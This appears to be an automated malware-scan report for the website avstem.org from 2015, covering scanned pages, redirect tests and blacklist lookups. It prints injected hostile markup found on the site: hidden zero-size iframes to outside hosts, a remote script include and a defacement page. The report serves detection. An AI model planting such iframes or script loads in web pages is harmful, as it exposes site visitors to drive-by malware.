Scanned pages/files
Request | Server response | Status |
http://avstem.org/ | 200 OK Content-Length: 9763 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://hacking-tut0rials.blogspot.com <iframe width="0" height="0" src="http://hacking-tut0rials.blogspot.com" frameborder="0" allowfullscreen> Hidden iFrame found. size: 0x0 src: http://bit.ly/1pqlty4 <iframe width="0" height="0" src="http://bit.ly/1pqlty4" frameborder="0" allowfullscreen> Hidden iFrame found. size: 0x0 src: http://hotelakanksha.com/img/hunter_gujjar-pca.swf <iframe width="0" height="0" scrolling="no" frameborder="no" src="http://hotelakanksha.com/img/hunter_gujjar-pca.swf"> Hidden iFrame found. size: 0x0 src: http://bit.ly/1jutpye <iframe width="0" height="0" src="http://bit.ly/1jutpye" frameborder="0" allowfullscreen> Deface/Content modification. The following signature was found: HACKED By D4RK 4NG31 ...[570 bytes skipped]... meborder="no" src="http://hotelakanksha.com/img/Hunter_Gujjar-PCA.swf"></iframe> </body> </ <head> <meta http-equiv="Content-Language" content="fa" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script type="text/javascript" src="http://bestdoublestrollersreviews.com//tca.js"></script> <title>HACKED By D4RK 4NG31</title> <style type="text/css"> .style1 { text-align: center; font-size: 14pt; color: #00FF00; } .style2 { text-align: center; font-family: Arial Black; font-size: 25pt; color: #00FF00; } .style5 { font-family: Tahoma; } </style> </head> <body style="color: #FF0000; background-color: #000000"> <p class="style1" ...[10633 bytes skipped]... | ||
http://bestdoublestrollersreviews.com//tca.js/ | HTTP/1.1 302 Found Connection: close Date: Sat, 28 Nov 2015 23:36:36 GMT Location: http://bestdoublestrollersreviews.com/cgi-sys/suspendedpage.cgi Server: Apache/2.4.12 Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://bestdoublestrollersreviews.com/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 3639 Content-Type: text/html | clean |
http://bestdoublestrollersreviews.com/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 28 Nov 2015 23:36:37 GMT Location: http://bestdoublestrollersreviews.com/cgi-sys/suspendedpage.cgi Server: Apache/2.4.12 Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: avstem.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Nov 2015 20:35:17 GMT
Server: Apache/2.2.22 (Fedora)
Content-Type: text/html; charset=UTF-8
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.4.9
GET / HTTP/1.1
Host: avstem.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Nov 2015 20:35:17 GMT
Server: Apache/2.2.22 (Fedora)
Content-Type: text/html; charset=UTF-8
X-Died: timeout at scan.pm line 1566.
X-Powered-By: PHP/5.4.9
Second query (visit from search engine):
GET / HTTP/1.1
Host: avstem.org
Referer: http://www.google.com/search?q=avstem.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: avstem.org
Referer: http://www.google.com/search?q=avstem.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=avstem.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://avstem.org/
Result: avstem.org is not infected or malware details are not published yet.
Result: avstem.org is not infected or malware details are not published yet.